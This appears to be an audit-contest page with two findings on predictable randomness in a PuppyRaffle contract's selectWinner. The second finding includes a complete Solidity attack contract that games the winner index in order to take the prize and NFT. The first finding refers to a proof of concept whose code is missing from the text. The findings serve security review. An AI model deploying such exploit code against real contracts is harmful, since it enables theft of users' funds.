Weak Randomness in `selectWinner` allows for guaranteed wins and raffle manipulation
Weak Randomness in selectWinner allows for guaranteed wins and raffle manipulation
Description:
The contract uses completely predictable on-chain data (msg.sender, block.timestamp, and block.difficulty) within a keccak256 function to choose the winning player and determine NFT rarity.
Impact:
On-chain randomness is deterministic. Any user or miner can pre-calculate the winner externally before interacting with the contract. An attacker can create a contract that pre-calculates if they will win in the current block; if not, they simply revert the transaction or wait for the next block. This completely destroys the nature of the lottery, allowing for guaranteed fund theft with no real luck involved.
Risk:
-
Likelihood: High. The randomness formula is completely transparent on-chain and trivial to simulate via external calls.
-
Severity: High. Guaranteed manipulation of the core protocol functionality (the raffle), leading to stolen prizes and NFTs.
Proof of Concept:
In the WeakRandomness.t.sol test, the attacker contract uses the same mathematical logic as PuppyRaffle to predict when the resulting index will match their own. They simply wait for a favorable block.timestamp and call selectWinner(), securing the prize and NFT with 100% certainty.
An attacker can easily exploit this by deploying a smart contract with the following logic:
Additionally, miners can manipulate block.timestamp within a small window to force the predictedIndex to match their own index.
Recommended Mitigation:
Never use on-chain variables as a source of entropy for critical operations involving value. The recommended and industry-standard approach in Web3 is to integrate a Verifiable Random Function oracle, such as Chainlink VRF, which mathematically guarantees a truly unpredictable result.
Lead Judging Commences
[H-03] Randomness can be gamed
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.